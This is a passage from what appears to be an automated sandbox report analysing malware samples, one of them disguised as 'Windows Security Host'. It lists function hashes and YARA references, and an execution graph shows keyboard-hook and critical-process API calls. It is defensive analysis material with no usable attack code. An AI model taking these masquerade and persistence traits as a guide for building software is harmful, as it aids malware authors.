                                                                                                                                                        Function 00007FFAAC583F65 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9ec08f70ca2dfc410d6223b4114b5707a6bbf62e5d2e1465d914de1c73941e81
                                                                                                                                                        • Instruction ID: 24a1cae810e92bda19b99eaff4a41e342ca83e0e87789b16f24c7a7a2cf93952
                                                                                                                                                        • Opcode Fuzzy Hash: 9ec08f70ca2dfc410d6223b4114b5707a6bbf62e5d2e1465d914de1c73941e81
                                                                                                                                                        • Instruction Fuzzy Hash: 0B21D432D8E95BCAF7A0A33448212FA36D8EF46310F408175E81CD7482EF1CAA1D27C1
                                                                                                                                                        Function 00007FFAAC582E19 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: fcf20e6a39041b7139a5f3fb2c7ca1278f0376e46f2d84baed1d4873f8eb6cb9
                                                                                                                                                        • Instruction ID: b272894ba17eb75715d5c5a9298a1a0c27ab1e71d1b80a3542e331249e9039c8
                                                                                                                                                        • Opcode Fuzzy Hash: fcf20e6a39041b7139a5f3fb2c7ca1278f0376e46f2d84baed1d4873f8eb6cb9
                                                                                                                                                        • Instruction Fuzzy Hash: 9411065144E7C61FE31AA3784C2A5B97FD4DF57220F0946FEE489C75D3EC58A80A8392
                                                                                                                                                        Function 00007FFAAC583E4D Relevance: .1, Instructions: 72COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: da783a81731afab3c7a7db777c2e6d8f4d0014241749d2cd38f9a5c853a6e68c
                                                                                                                                                        • Instruction ID: b82d5ce9d9837ca6ba98e38076c66c87d40f7d3989672f323dd1eaf56eac5b37
                                                                                                                                                        • Opcode Fuzzy Hash: da783a81731afab3c7a7db777c2e6d8f4d0014241749d2cd38f9a5c853a6e68c
                                                                                                                                                        • Instruction Fuzzy Hash: 3821D25194E6CA0FE352977C48661A93FD0CF47120F0A49EFD0C9CB5E3E84C984B9342
                                                                                                                                                        Function 00007FFAAC586C19 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b64ac37906d8a422c14c1b5400f74027d1170c6c2dce972310b9bc7e824423bf
                                                                                                                                                        • Instruction ID: e3e57a01903911b6c22029242f7795ef9c0568abc5662ddeb9d1eab3cff38677
                                                                                                                                                        • Opcode Fuzzy Hash: b64ac37906d8a422c14c1b5400f74027d1170c6c2dce972310b9bc7e824423bf
                                                                                                                                                        • Instruction Fuzzy Hash: A611AF05A4F6838FF7905BB828162B52FD4DF6B650F0880F5E48DC7183DA1CA91E53D2
                                                                                                                                                        Function 00007FFAAC586C27 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 585ea2e980004dd3df2dde462ce0f323f0f540b43e6f39f5fcbcf861ec2d9000
                                                                                                                                                        • Instruction ID: 5390bb663132ce5266c5344d6708812b3c25caedbaadf74849c28b35ffbb853b
                                                                                                                                                        • Opcode Fuzzy Hash: 585ea2e980004dd3df2dde462ce0f323f0f540b43e6f39f5fcbcf861ec2d9000
                                                                                                                                                        • Instruction Fuzzy Hash: 2311E305A4E6478FFB906BBC34162F42BC4EF6A640F0480B5E88DC3183EE1CA91E53D2
                                                                                                                                                        Function 00007FFAAC580E45 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 819a8f905991bfbf956dcd078d0df78961da2740b69ea6d50029bd3bbc821625
                                                                                                                                                        • Instruction ID: 9f35010b241605a35134a5896c93668587a335c6d924ccb6b31f28daa636d3c8
                                                                                                                                                        • Opcode Fuzzy Hash: 819a8f905991bfbf956dcd078d0df78961da2740b69ea6d50029bd3bbc821625
                                                                                                                                                        • Instruction Fuzzy Hash: 5001D65150DA892FE318A278481B9BA7BC5DF9B210F1545BEE48AC3193EC58B8074392
                                                                                                                                                        Function 00007FFAAC58426F Relevance: .1, Instructions: 53COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3e3f0401e4ef6963807f7cc15c95151c229086fa8b94b298b785600fcd43b0ae
                                                                                                                                                        • Instruction ID: 7fa04422d704d41ae7a2bfe1677078b76ecf86cc8b3b83dad1cb85559d387515
                                                                                                                                                        • Opcode Fuzzy Hash: 3e3f0401e4ef6963807f7cc15c95151c229086fa8b94b298b785600fcd43b0ae
                                                                                                                                                        • Instruction Fuzzy Hash: 79014E32A4E94E8BEB04DB56AC505F57BD8FF95334F04427AE80DC3080DB65D559C781
                                                                                                                                                        Function 00007FFAAC58413C Relevance: .1, Instructions: 52COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2023912e2ec101f26a2e4ae6213abe112309108daf2482548a8723df4a7cdb07
                                                                                                                                                        • Instruction ID: d907779d4e25053deec36de1eb8a6b2ae700d52f3e50513f846f5d1f109b5eac
                                                                                                                                                        • Opcode Fuzzy Hash: 2023912e2ec101f26a2e4ae6213abe112309108daf2482548a8723df4a7cdb07
                                                                                                                                                        • Instruction Fuzzy Hash: 94015274A1850A8FEF88DF24C8506BA73A2FFA9311F14C139D40AD3284CF34E8529B80
                                                                                                                                                        Function 00007FFAAC582EC0 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 72f604a272e5661a01efa6c9c1b2372342c2d18e99aff9735e606403723ebc11
                                                                                                                                                        • Instruction ID: d4f236b4596c6c54b398aab50bd666bbcff2cbae77fd7d65cb8cd12220d1aca4
                                                                                                                                                        • Opcode Fuzzy Hash: 72f604a272e5661a01efa6c9c1b2372342c2d18e99aff9735e606403723ebc11
                                                                                                                                                        • Instruction Fuzzy Hash: B4012161B2C6415BD3046B7CE8566ADB7D5EF89700F50857EF48EC32A3CE28A8428686
                                                                                                                                                        Function 00007FFAAC5817E9 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a76460599c7064e922103838e666d6a2b97494b64b6b9c54c8919e0e575b2cbd
                                                                                                                                                        • Instruction ID: 54c3bd48049cafa19938fefbb29a05a0f88f10178ff84977c8751b75ba107473
                                                                                                                                                        • Opcode Fuzzy Hash: a76460599c7064e922103838e666d6a2b97494b64b6b9c54c8919e0e575b2cbd
                                                                                                                                                        • Instruction Fuzzy Hash: B301D43150DB899FD785D718D0605F7BBE1EF8A320F44457EF089C7291CA24DA4487C2
                                                                                                                                                        Function 00007FFAAC580E10 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d39b97d365f3864f75f099e05f27aad88ef1274d65bd8c7a747e796346a048be
                                                                                                                                                        • Instruction ID: 0c374556a68ffc80a2d7de2c76a18cf70ef3fc14a881067686addfbc3afe56cf
                                                                                                                                                        • Opcode Fuzzy Hash: d39b97d365f3864f75f099e05f27aad88ef1274d65bd8c7a747e796346a048be
                                                                                                                                                        • Instruction Fuzzy Hash: E0F06D3294DA4A9BE788D708D4556BB77D5EBD9350F80453EF04ED2290CE25DA4487C1
                                                                                                                                                        Function 00007FFAAC581A80 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 40cfd6902a2d994f971887d865607691e5e34c080fcb6cb969c7b7a5f23a0421
                                                                                                                                                        • Instruction ID: 2bec6c9d30441d31028fe25081e478e2eb6582cd8c4746a5873662a3dbcda733
                                                                                                                                                        • Opcode Fuzzy Hash: 40cfd6902a2d994f971887d865607691e5e34c080fcb6cb969c7b7a5f23a0421
                                                                                                                                                        • Instruction Fuzzy Hash: 35E06872D58B8C8BEB40A75CB8009E97BA4EF86314F040069F00DC3180C6249958C3D2
                                                                                                                                                        Function 00007FFAAC580CFD Relevance: .0, Instructions: 25COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 595193ee9f4e7bb4859eefcf31611c1220344d289e9015bf9adf7a22557d7be1
                                                                                                                                                        • Instruction ID: c907eda5860d3f43f8e29551b3105a4c0fb08b158ceb1b2834410b1a3faeda80
                                                                                                                                                        • Opcode Fuzzy Hash: 595193ee9f4e7bb4859eefcf31611c1220344d289e9015bf9adf7a22557d7be1
                                                                                                                                                        • Instruction Fuzzy Hash: 69E01261FDA81E89FA44B3B4A8169FDB299EFC9301FC18875E40EC2187DD18651947C1
                                                                                                                                                        Function 00007FFAAC5809AD Relevance: .0, Instructions: 25COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6b236ac38416885579dc27cd20540369b0e3408b9b8bd410af459a132d68ea95
                                                                                                                                                        • Instruction ID: b2e476f85b57756c3744c106630574a865d8ccc9025e94f628e93ff2c9e755a8
                                                                                                                                                        • Opcode Fuzzy Hash: 6b236ac38416885579dc27cd20540369b0e3408b9b8bd410af459a132d68ea95
                                                                                                                                                        • Instruction Fuzzy Hash: FBE0C222FCA80A89FA00B374A8169FDB289EFC9300FC0C871E00EC2083CD28690503C1
                                                                                                                                                        Function 00007FFAAC5808FE Relevance: .0, Instructions: 17COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 469776f51fab917b5fb1439333d65b3cbf55f0c3314cead27647c132a043cc78
                                                                                                                                                        • Instruction ID: 81b25e39c308138d608a32644d224505b29e66e32e365aeda65a6315e950cdf1
                                                                                                                                                        • Opcode Fuzzy Hash: 469776f51fab917b5fb1439333d65b3cbf55f0c3314cead27647c132a043cc78
                                                                                                                                                        • Instruction Fuzzy Hash: A6D0127245C7094BC2049B54E4408DAB7A4FB89374F404B79E09E911A1DB6893858781
                                                                                                                                                        Function 00007FFAAC580C57 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 1ac6ba6de97288da37ad45b676fefd4b833e177c9567e1a799456d2dea903ae6
                                                                                                                                                        • Instruction ID: c7261cb6c71fafe9f8ed927d9ade655fbef88c4f691c69c9be569ee4c5e799d3
                                                                                                                                                        • Opcode Fuzzy Hash: 1ac6ba6de97288da37ad45b676fefd4b833e177c9567e1a799456d2dea903ae6
                                                                                                                                                        • Instruction Fuzzy Hash: 14D05E3242CB0A8BD344DF14E4408EAB7A0FFC5320F800B6DF06E961E5DE7492858782
                                                                                                                                                        Function 00007FFAAC583F43 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: fa1be3943de430a59966a4385f0f7314d8d2e4f9419f9318c7b4ee1fbc65efc8
                                                                                                                                                        • Instruction ID: 508eb8a21415bb8a12ea3ff773431f055f7a4010be3fb0c06c4f0c12b074eb9e
                                                                                                                                                        • Opcode Fuzzy Hash: fa1be3943de430a59966a4385f0f7314d8d2e4f9419f9318c7b4ee1fbc65efc8
                                                                                                                                                        • Instruction Fuzzy Hash: 7AC0123346D54697E341B710E4418EF7351BFD1200F801F79F08E81095DD59A6448682

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 00007FFAAC580758 Relevance: 5.0, Strings: 4, Instructions: 17COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: O_^0$O_^2$O_^4$O_^6
                                                                                                                                                        • API String ID: 0-2383015730
                                                                                                                                                        • Opcode ID: f790db44a0c80e22bfcf37a17d3dfcef4f46ad36439c74b7ca0898ea9ff77562
                                                                                                                                                        • Instruction ID: 8232578a995488ae6e58ba5a7f4586a02b1818ec2597d3431c1df9ba5f01d6c2
                                                                                                                                                        • Opcode Fuzzy Hash: f790db44a0c80e22bfcf37a17d3dfcef4f46ad36439c74b7ca0898ea9ff77562
                                                                                                                                                        • Instruction Fuzzy Hash: 63D012FE8940284ED5021CF058E44FC9B84820137A3306AA3D56FD9203CC41D2D3E040
                                                                                                                                                        Function 00007FFAAC580728 Relevance: 5.0, Strings: 4, Instructions: 6COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1315247551.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffaac580000_Injector.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: O_^0$O_^2$O_^4$O_^6
                                                                                                                                                        • API String ID: 0-2383015730
                                                                                                                                                        • Opcode ID: 34408508bba5bbec9dbd30ef4ed73ecfb48e6a658769067ca2bcd904751eafa5
                                                                                                                                                        • Instruction ID: 7204e3eebd18ba19ddb94e1b125f1687e28ab7c2550231b4b090a1be9026c920
                                                                                                                                                        • Opcode Fuzzy Hash: 34408508bba5bbec9dbd30ef4ed73ecfb48e6a658769067ca2bcd904751eafa5
                                                                                                                                                        • Instruction Fuzzy Hash: 94B0026345D0524192017578B8664E457514F0D33975CC571D0CD481636C0534855184

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:18.4%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                        Total number of Nodes:33
                                                                                                                                                        Total number of Limit Nodes:3
                                                                                                                                                        execution_graph 4728 7ffaac5a3b49 4729 7ffaac5a3b55 4728->4729 4734 7ffaac5a13e8 4729->4734 4731 7ffaac5a3eb0 4732 7ffaac5a3ebf 4731->4732 4733 7ffaac5a13e8 SetWindowsHookExW 4731->4733 4733->4732 4734->4731 4735 7ffaac5a4d90 4734->4735 4737 7ffaac5a4db0 4735->4737 4738 7ffaac5a2e90 4735->4738 4737->4731 4740 7ffaac5a2e99 4738->4740 4739 7ffaac5a2e9e 4740->4739 4743 7ffaac5a2f34 4740->4743 4744 7ffaac5a2f4f SetWindowsHookExW 4743->4744 4746 7ffaac5a2f27 4744->4746 4747 7ffaac5a3089 4750 7ffaac5a30c3 SetWindowsHookExW 4747->4750 4749 7ffaac5a3141 4750->4749 4751 7ffaac5a43fa 4752 7ffaac5a440d 4751->4752 4753 7ffaac5a2e90 SetWindowsHookExW 4752->4753 4756 7ffaac5a4539 4752->4756 4754 7ffaac5a456a 4753->4754 4757 7ffaac5a2eb0 4754->4757 4758 7ffaac5a2eb7 4757->4758 4759 7ffaac5a2f34 SetWindowsHookExW 4758->4759 4760 7ffaac5a2f27 4759->4760 4724 7ffaac5a332d 4725 7ffaac5a3390 RtlSetProcessIsCritical 4724->4725 4727 7ffaac5a3412 4725->4727 4761 7ffaac5a4d4e 4762 7ffaac5a4d79 4761->4762 4763 7ffaac5a2e90 SetWindowsHookExW 4762->4763 4764 7ffaac5a4db0 4762->4764 4763->4764

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00007FFAAC5A2F34 Relevance: 1.8, APIs: 1, Instructions: 293COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 307 7ffaac5a2f34-7ffaac5a2f4d 308 7ffaac5a2f65-7ffaac5a2f75 307->308 309 7ffaac5a2f4f-7ffaac5a2f60 307->309 311 7ffaac5a2f77-7ffaac5a2f78 308->311 312 7ffaac5a2f7a-7ffaac5a2f89 308->312 309->308 311->312 313 7ffaac5a2f8b 312->313 314 7ffaac5a2f8c-7ffaac5a2ff8 312->314 313->314 317 7ffaac5a3002-7ffaac5a3034 314->317 318 7ffaac5a2ffa-7ffaac5a2fff 314->318 320 7ffaac5a3036 317->320 321 7ffaac5a303c-7ffaac5a306f 317->321 318->317 320->321 323 7ffaac5a307a-7ffaac5a30ed 321->323 324 7ffaac5a3071-7ffaac5a3079 321->324 327 7ffaac5a30f3-7ffaac5a30f8 323->327 328 7ffaac5a3179-7ffaac5a317d 323->328 324->323 332 7ffaac5a30ff-7ffaac5a3100 327->332 329 7ffaac5a3102-7ffaac5a313f SetWindowsHookExW 328->329 330 7ffaac5a3147-7ffaac5a3178 329->330 331 7ffaac5a3141 329->331 331->330 332->329
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2495362336.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ffaac5a0000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HookWindows
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2559412058-0
                                                                                                                                                        • Opcode ID: 5aaa1a2b4a8cedb50be4e4d9ccedc933c8a9529234f03aa29de77c2493b79da4
                                                                                                                                                        • Instruction ID: f070bb53b4ed4f2111b06e3731db38113ebc4955ae3c80906afcf77ed73f2c26
                                                                                                                                                        • Opcode Fuzzy Hash: 5aaa1a2b4a8cedb50be4e4d9ccedc933c8a9529234f03aa29de77c2493b79da4
                                                                                                                                                        • Instruction Fuzzy Hash: 2981E73190CA4D9FDB58DB68D84A6F97BE0FF56321F04427ED00DD3152DB64A846C791
                                                                                                                                                        Function 00007FFAAC5A332D Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 434 7ffaac5a332d-7ffaac5a3410 RtlSetProcessIsCritical 437 7ffaac5a3412 434->437 438 7ffaac5a3418-7ffaac5a344d 434->438 437->438
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2495362336.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ffaac5a0000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2695349919-0
                                                                                                                                                        • Opcode ID: ab522ed7970eff53a3982917fc46b9534c7a58114c54bc904cc8ccf820cf95ef
                                                                                                                                                        • Instruction ID: 3abcf2ffd8292eed36bb92d5b1031bb085f57c3a626dc3ca760f28f0c0a8dd68
                                                                                                                                                        • Opcode Fuzzy Hash: ab522ed7970eff53a3982917fc46b9534c7a58114c54bc904cc8ccf820cf95ef
                                                                                                                                                        • Instruction Fuzzy Hash: 1B41053180C6498FD719DFA8D845BE97BF0FF56311F04416EE08AC3692DB74A446CBA1
                                                                                                                                                        Function 00007FFAAC5A3089 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 440 7ffaac5a3089-7ffaac5a30ed 443 7ffaac5a30f3-7ffaac5a30f8 440->443 444 7ffaac5a3179-7ffaac5a317d 440->444 448 7ffaac5a30ff-7ffaac5a3100 443->448 445 7ffaac5a3102-7ffaac5a313f SetWindowsHookExW 444->445 446 7ffaac5a3147-7ffaac5a3178 445->446 447 7ffaac5a3141 445->447 447->446 448->445
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2495362336.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ffaac5a0000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HookWindows
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2559412058-0
                                                                                                                                                        • Opcode ID: d44c1fa2f3ae0e858a3ebcf64c2f80e609fdfe30c6ee0514f935cad2cebd2b68
                                                                                                                                                        • Instruction ID: 3f7749e719c6b903163c775ee78e57e2957b9f81f469a5573d998fb6de47a1ec
                                                                                                                                                        • Opcode Fuzzy Hash: d44c1fa2f3ae0e858a3ebcf64c2f80e609fdfe30c6ee0514f935cad2cebd2b68
                                                                                                                                                        • Instruction Fuzzy Hash: 6E31A571A1CA1D9FDB58EB6CD8466F977E1FB99321F10423ED00ED3252DE60A8168BC1

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00007FFAAC596DB0 Relevance: .9, Instructions: 939COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1629572865.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ffaac590000_BootstrapperV1.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9f0c193524c3004dfbbd64b68a255a67a021a6564148eb45342047e5c0660c04
